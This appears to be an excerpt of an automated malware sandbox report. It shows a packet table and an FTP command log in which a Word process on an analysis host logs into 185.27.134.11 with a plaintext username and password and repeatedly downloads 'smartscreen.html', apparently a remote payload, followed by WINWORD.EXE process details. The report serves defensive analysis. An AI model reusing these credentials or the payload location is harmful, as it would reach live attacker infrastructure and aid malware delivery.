Sep 19, 2022 15:35:13.424968958 CEST  21           49173      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:13.425057888 CEST  49173        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:13.425141096 CEST  49173        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:13.472584009 CEST  21           49173      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:13.472754955 CEST  49173        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:13.477826118 CEST  49173        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:13.525742054 CEST  21           49173      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:13.525924921 CEST  49173        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:13.531837940 CEST  49175        39352      192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:13.533164024 CEST  49177        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:13.581041098 CEST  39352        49175      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:13.582622051 CEST  21           49177      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:13.583245993 CEST  49177        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:13.630390882 CEST  21           49177      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:13.630552053 CEST  49177        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:13.631063938 CEST  49177        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:13.677095890 CEST  21           49177      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:13.677181005 CEST  21           49177      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:13.677294016 CEST  49177        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:13.677336931 CEST  49177        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:13.762310028 CEST  21           49177      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:16.897815943 CEST  21           49177      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:16.898062944 CEST  49177        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:16.913120985 CEST  49177        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:16.959027052 CEST  21           49177      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:16.959233999 CEST  49177        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:16.959665060 CEST  21           49177      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:16.959733963 CEST  49177        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:16.975233078 CEST  49174        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:17.021047115 CEST  21           49174      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:17.021126032 CEST  49174        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:17.021822929 CEST  49174        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:17.067738056 CEST  21           49174      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:17.068016052 CEST  49174        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:17.068191051 CEST  49178        21699      192.168.2.22   185.27.134.11
Timestamp                             Source Port  Dest Port  Source IP      Dest IP        Commands
Sep 19, 2022 15:35:09.497766972 CEST  21           49173      185.27.134.11  192.168.2.22   220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
        220-You are user number 434 of 6900 allowed.
        220-Local time is now 09:04. Server port: 21.
        220-This is a private system - No anonymous login
        220 You will be disconnected after 60 seconds of inactivity.
Sep 19, 2022 15:35:09.499121904 CEST  49173        21         192.168.2.22   185.27.134.11  USER epiz_32622638
Sep 19, 2022 15:35:09.546256065 CEST  21           49173      185.27.134.11  192.168.2.22   331 User epiz_32622638 OK. Password required
Sep 19, 2022 15:35:09.558320999 CEST  49173        21         192.168.2.22   185.27.134.11  PASS 9pTise0WWBCZj
Sep 19, 2022 15:35:09.635483980 CEST  21           49173      185.27.134.11  192.168.2.22   230-Your bandwidth usage is restricted
        230 OK. Current restricted directory is /
Sep 19, 2022 15:35:09.762413025 CEST  21           49174      185.27.134.11  192.168.2.22   220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
        220-You are user number 439 of 6900 allowed.
        220-Local time is now 09:04. Server port: 21.
        220-This is a private system - No anonymous login
        220 You will be disconnected after 60 seconds of inactivity.
Sep 19, 2022 15:35:09.763664961 CEST  49174        21         192.168.2.22   185.27.134.11  USER epiz_32622638
Sep 19, 2022 15:35:09.809530973 CEST  21           49174      185.27.134.11  192.168.2.22   331 User epiz_32622638 OK. Password required
Sep 19, 2022 15:35:09.809971094 CEST  49174        21         192.168.2.22   185.27.134.11  PASS 9pTise0WWBCZj
Sep 19, 2022 15:35:09.883455038 CEST  21           49174      185.27.134.11  192.168.2.22   230-Your bandwidth usage is restricted
        230 OK. Current restricted directory is /
Sep 19, 2022 15:35:09.884032011 CEST  49174        21         192.168.2.22   185.27.134.11  TYPE I
Sep 19, 2022 15:35:09.930010080 CEST  21           49174      185.27.134.11  192.168.2.22   200 TYPE is now 8-bit binary
Sep 19, 2022 15:35:09.932235956 CEST  49174        21         192.168.2.22   185.27.134.11  PASV
Sep 19, 2022 15:35:09.978365898 CEST  21           49174      185.27.134.11  192.168.2.22   227 Entering Passive Mode (185,27,134,11,153,184)
Sep 19, 2022 15:35:10.077305079 CEST  21           49174      185.27.134.11  192.168.2.22   213 6785
Sep 19, 2022 15:35:10.077773094 CEST  49174        21         192.168.2.22   185.27.134.11  RETR /wwwwwwwwwwwwwwwwwwww/smartscreen.html
Sep 19, 2022 15:35:10.123992920 CEST  21           49174      185.27.134.11  192.168.2.22   150-Accepted data connection
        150 6.6 kbytes to download
Sep 19, 2022 15:35:10.124320984 CEST  21           49174      185.27.134.11  192.168.2.22   226-File successfully transferred
        226 0.000 seconds (measured here), 42.01 Mbytes per second
Sep 19, 2022 15:35:13.237507105 CEST  49173        21         192.168.2.22   185.27.134.11  CWD /wwwwwwwwwwwwwwwwwwww/
Sep 19, 2022 15:35:13.283632994 CEST  21           49173      185.27.134.11  192.168.2.22   250 OK. Current directory is /wwwwwwwwwwwwwwwwwwww
Sep 19, 2022 15:35:13.284157991 CEST  49173        21         192.168.2.22   185.27.134.11  PWD
Sep 19, 2022 15:35:13.330005884 CEST  21           49173      185.27.134.11  192.168.2.22   257 "/wwwwwwwwwwwwwwwwwwww" is your current location
Sep 19, 2022 15:35:13.330579042 CEST  49173        21         192.168.2.22   185.27.134.11  TYPE A
Sep 19, 2022 15:35:13.376211882 CEST  21           49173      185.27.134.11  192.168.2.22   200 TYPE is now ASCII
Sep 19, 2022 15:35:13.377398014 CEST  49173        21         192.168.2.22   185.27.134.11  PORT 192,168,2,22,192,24
Sep 19, 2022 15:35:13.424968958 CEST  21           49173      185.27.134.11  192.168.2.22   500 I won't open a connection to 192.168.2.22 (only to 84.17.52.43)
Sep 19, 2022 15:35:13.472584009 CEST  21           49173      185.27.134.11  192.168.2.22   500 Unknown command
Sep 19, 2022 15:35:13.477826118 CEST  49173        21         192.168.2.22   185.27.134.11  CWD /wwwwwwwwwwwwwwwwwwww/
Sep 19, 2022 15:35:13.525742054 CEST  21           49173      185.27.134.11  192.168.2.22   250 OK. Current directory is /wwwwwwwwwwwwwwwwwwww
Sep 19, 2022 15:35:13.630390882 CEST  21           49177      185.27.134.11  192.168.2.22   220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
        220-You are user number 437 of 6900 allowed.
        220-Local time is now 09:04. Server port: 21.
        220-This is a private system - No anonymous login
        220 You will be disconnected after 60 seconds of inactivity.
Sep 19, 2022 15:35:13.631063938 CEST  49177        21         192.168.2.22   185.27.134.11  USER anonymous
Sep 19, 2022 15:35:13.677181005 CEST  21           49177      185.27.134.11  192.168.2.22   331 User anonymous OK. Password required
Sep 19, 2022 15:35:13.677336931 CEST  49177        21         192.168.2.22   185.27.134.11  PASS User@
Sep 19, 2022 15:35:16.897815943 CEST  21           49177      185.27.134.11  192.168.2.22   530 Login authentication failed
Sep 19, 2022 15:35:16.959027052 CEST  21           49177      185.27.134.11  192.168.2.22   530 Logout.
Sep 19, 2022 15:35:16.975233078 CEST  49174        21         192.168.2.22   185.27.134.11  TYPE I
Sep 19, 2022 15:35:17.021047115 CEST  21           49174      185.27.134.11  192.168.2.22   200 TYPE is now 8-bit binary
Sep 19, 2022 15:35:17.021822929 CEST  49174        21         192.168.2.22   185.27.134.11  PASV
Sep 19, 2022 15:35:17.067738056 CEST  21           49174      185.27.134.11  192.168.2.22   227 Entering Passive Mode (185,27,134,11,84,195)
Sep 19, 2022 15:35:17.170260906 CEST  21           49174      185.27.134.11  192.168.2.22   213 6785
Sep 19, 2022 15:35:17.170964003 CEST  49174        21         192.168.2.22   185.27.134.11  RETR /wwwwwwwwwwwwwwwwwwww/smartscreen.html
Sep 19, 2022 15:35:17.217103004 CEST  21           49174      185.27.134.11  192.168.2.22   150-Accepted data connection
        150 6.6 kbytes to download
Sep 19, 2022 15:35:17.217526913 CEST  21           49174      185.27.134.11  192.168.2.22   226-File successfully transferred
        226 0.000 seconds (measured here), 58.74 Mbytes per second
Sep 19, 2022 15:35:18.153563023 CEST  49173        21         192.168.2.22   185.27.134.11  CWD /wwwwwwwwwwwwwwwwwwww/
Sep 19, 2022 15:35:18.205420971 CEST  21           49173      185.27.134.11  192.168.2.22   250 OK. Current directory is /wwwwwwwwwwwwwwwwwwww
Sep 19, 2022 15:35:18.214751005 CEST  49173        21         192.168.2.22   185.27.134.11  PWD
Sep 19, 2022 15:35:18.261095047 CEST  21           49173      185.27.134.11  192.168.2.22   257 "/wwwwwwwwwwwwwwwwwwww" is your current location
Sep 19, 2022 15:35:18.279761076 CEST  49173        21         192.168.2.22   185.27.134.11  TYPE A
Sep 19, 2022 15:35:18.325869083 CEST  21           49173      185.27.134.11  192.168.2.22   200 TYPE is now ASCII
Sep 19, 2022 15:35:18.575798035 CEST  49173        21         192.168.2.22   185.27.134.11  PORT 192,168,2,22,192,27
Sep 19, 2022 15:35:18.621969938 CEST  21           49173      185.27.134.11  192.168.2.22   500 I won't open a connection to 192.168.2.22 (only to 84.17.52.43)
Sep 19, 2022 15:35:18.669007063 CEST  21           49173      185.27.134.11  192.168.2.22   500 Unknown command
Sep 19, 2022 15:35:18.670809031 CEST  49173        21         192.168.2.22   185.27.134.11  CWD /wwwwwwwwwwwwwwwwwwww/
Sep 19, 2022 15:35:18.716697931 CEST  21           49173      185.27.134.11  192.168.2.22   250 OK. Current directory is /wwwwwwwwwwwwwwwwwwww
Sep 19, 2022 15:35:18.813282013 CEST  21           49180      185.27.134.11  192.168.2.22   220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
        220-You are user number 425 of 6900 allowed.
        220-Local time is now 09:04. Server port: 21.
        220-This is a private system - No anonymous login
        220 You will be disconnected after 60 seconds of inactivity.
Sep 19, 2022 15:35:18.881031036 CEST  49180        21         192.168.2.22   185.27.134.11  USER anonymous
Sep 19, 2022 15:35:18.929721117 CEST  21           49180      185.27.134.11  192.168.2.22   331 User anonymous OK. Password required
Sep 19, 2022 15:35:18.942280054 CEST  49180        21         192.168.2.22   185.27.134.11  PASS User@
Sep 19, 2022 15:35:23.883035898 CEST  21           49180      185.27.134.11  192.168.2.22   530 Login authentication failed
Sep 19, 2022 15:35:23.899719000 CEST  49174        21         192.168.2.22   185.27.134.11  TYPE I
Sep 19, 2022 15:35:23.929241896 CEST  21           49180      185.27.134.11  192.168.2.22   530 Logout.
Sep 19, 2022 15:35:23.947046041 CEST  21           49174      185.27.134.11  192.168.2.22   200 TYPE is now 8-bit binary
Sep 19, 2022 15:35:23.948895931 CEST  49174        21         192.168.2.22   185.27.134.11  PASV
Sep 19, 2022 15:35:23.997334957 CEST  21           49174      185.27.134.11  192.168.2.22   227 Entering Passive Mode (185,27,134,11,186,174)
Sep 19, 2022 15:35:24.090854883 CEST  21           49174      185.27.134.11  192.168.2.22   213 6785
Sep 19, 2022 15:35:24.091589928 CEST  49174        21         192.168.2.22   185.27.134.11  RETR /wwwwwwwwwwwwwwwwwwww/smartscreen.html
Sep 19, 2022 15:35:24.137540102 CEST  21           49174      185.27.134.11  192.168.2.22   150-Accepted data connection
        150 6.6 kbytes to download
Sep 19, 2022 15:35:24.137762070 CEST  21           49174      185.27.134.11  192.168.2.22   226-File successfully transferred
      226-File successfully transferred226 0.000 seconds (measured here), 76.24 Mbytes per second
      Sep 19, 2022 15:35:52.766136885 CEST4917421192.168.2.22185.27.134.11TYPE I
      Sep 19, 2022 15:35:52.812201977 CEST2149174185.27.134.11192.168.2.22200 TYPE is now 8-bit binary
      Sep 19, 2022 15:35:52.813280106 CEST4917421192.168.2.22185.27.134.11PASV
      Sep 19, 2022 15:35:52.859060049 CEST2149174185.27.134.11192.168.2.22227 Entering Passive Mode (185,27,134,11,197,220)
      Sep 19, 2022 15:35:52.951682091 CEST2149174185.27.134.11192.168.2.22213 6785
      Sep 19, 2022 15:35:52.954638958 CEST4917421192.168.2.22185.27.134.11RETR /wwwwwwwwwwwwwwwwwwww/smartscreen.html
      Sep 19, 2022 15:35:53.000704050 CEST2149174185.27.134.11192.168.2.22150-Accepted data connection
      150-Accepted data connection150 6.6 kbytes to download
      Sep 19, 2022 15:35:53.000948906 CEST2149174185.27.134.11192.168.2.22226-File successfully transferred
      226-File successfully transferred226 0.000 seconds (measured here), 33.02 Mbytes per second
      Sep 19, 2022 15:36:18.816196918 CEST2149173185.27.134.11192.168.2.22421 Timeout - try typing a little faster next time
      Sep 19, 2022 15:36:53.100967884 CEST2149174185.27.134.11192.168.2.22421 Timeout - try typing a little faster next time
      No statistics
      Target ID:0
      Start time:15:34:14
      Start date:19/09/2022
      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      Imagebase:0x13f7d0000
      File size:1423704 bytes
      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      No disassembly